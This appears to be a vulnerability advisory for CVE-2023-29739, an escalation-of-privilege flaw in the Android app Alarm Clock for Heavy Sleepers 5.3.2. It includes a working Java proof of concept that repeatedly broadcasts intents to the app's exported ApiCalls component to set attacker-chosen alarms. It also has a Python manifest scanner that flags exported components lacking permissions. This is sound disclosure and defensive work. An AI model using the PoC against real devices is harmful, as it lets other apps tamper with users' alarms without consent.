CVE-2023-29739: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
An issue found in Alarm Clock for Heavy Sleepers v.5.3.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.
Escalation of Privileges exists in Alarm Clock for Heavy Sleepers (CVE-2023-29739)
Vendor: Smart Alarm Clock Team (http://amdroidapp.com/)
Affected product: Alarm Clock for Heavy Sleepers (com.amdroidalarmclock.amdroid)
Version: 5.3.2
Download link: https://play.google.com/store/apps/details?id=com.amdroidalarmclock.amdroid
Description of the vulnerability for use in the CVE: An issue found in Alarm Clock for Heavy Sleepers v.5.3.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.
PoC:

```java
import android.content.ComponentName;
import android.content.Intent;
import java.util.ArrayList;

// Defined inside a class that extends Context (e.g. an Activity), since it calls sendBroadcast().
private void attack() {
    while (true) {
        Intent intent = new Intent();
        // Explicitly address the ApiCalls component of the alarm app.
        ComponentName componentName = new ComponentName("com.amdroidalarmclock.amdroid", "com.amdroidalarmclock.amdroid.ApiCalls");
        intent.setComponent(componentName);
        intent.setAction("android.intent.action.SET_ALARM");
        intent.setClassName("com.amdroidalarmclock.amdroid", "com.amdroidalarmclock.amdroid.ApiCalls");
        // Alarm parameters chosen by the sending app.
        intent.putExtra("android.intent.extra.alarm.HOUR", 11);
        intent.putExtra("android.intent.extra.alarm.MINUTES", 30);
        intent.putExtra("android.intent.extra.alarm.MESSAGE", "this is hack's message!");
        ArrayList<Integer> list = new ArrayList<>();
        list.add(0);
        list.add(1);
        list.add(0);
        list.add(1);
        list.add(0);
        list.add(1);
        list.add(0);
        intent.putIntegerArrayListExtra("android.intent.extra.alarm.DAYS", list);
        try {
            System.out.println("发送数据"); // "sending data"
            sendBroadcast(intent);
        } catch (Exception e) {
        }
    }
}
```
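A defender-side check for the condition the PoC relies on, added here as an example and not part of the original advisory: it scans a decoded `AndroidManifest.xml` for activities, services and receivers that are exported without a permission. The sample manifest is constructed; the advisory does not show the real one, so declaring `ApiCalls` as an exported receiver is an assumption, and `GuardedReceiver`, `InternalService` and `com.example.permission.MANAGE_ALARMS` are hypothetical names.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"
# Providers are left out: they have separate read/write permissions and defaults.
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver")

# Constructed sample, not the app's real manifest (assumption: ApiCalls is a receiver).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.amdroidalarmclock.amdroid">
  <application>
    <receiver android:name=".ApiCalls" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.SET_ALARM"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".GuardedReceiver" android:exported="true"
        android:permission="com.example.permission.MANAGE_ALARMS"/>
    <service android:name=".InternalService"/>
  </application>
</manifest>
"""

def is_exported(elem):
    explicit = elem.get(A + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    # Without an explicit value, an intent-filter makes the component exported.
    return elem.find("intent-filter") is not None

def full_name(package, name):
    if name.startswith("."):
        return package + name
    return name if "." in name else package + "." + name

def unprotected_components(manifest_xml):
    """Return (tag, class name, filter actions) for exported, permission-less components."""
    root = ET.fromstring(manifest_xml.strip())
    package = root.get("package", "")
    app = root.find("application")
    if app is None:
        return []
    app_permission = app.get(A + "permission")  # default for all components
    findings = []
    for elem in app:
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        if elem.get(A + "permission") or app_permission:
            continue
        actions = [a.get(A + "name") for a in elem.findall("intent-filter/action")]
        findings.append((elem.tag, full_name(package, elem.get(A + "name", "")), actions))
    return findings
```

A component that must stay exported can still be restricted with a permission whose protection level is `signature`; a permission at the `normal` level passes this check but can be requested by any app.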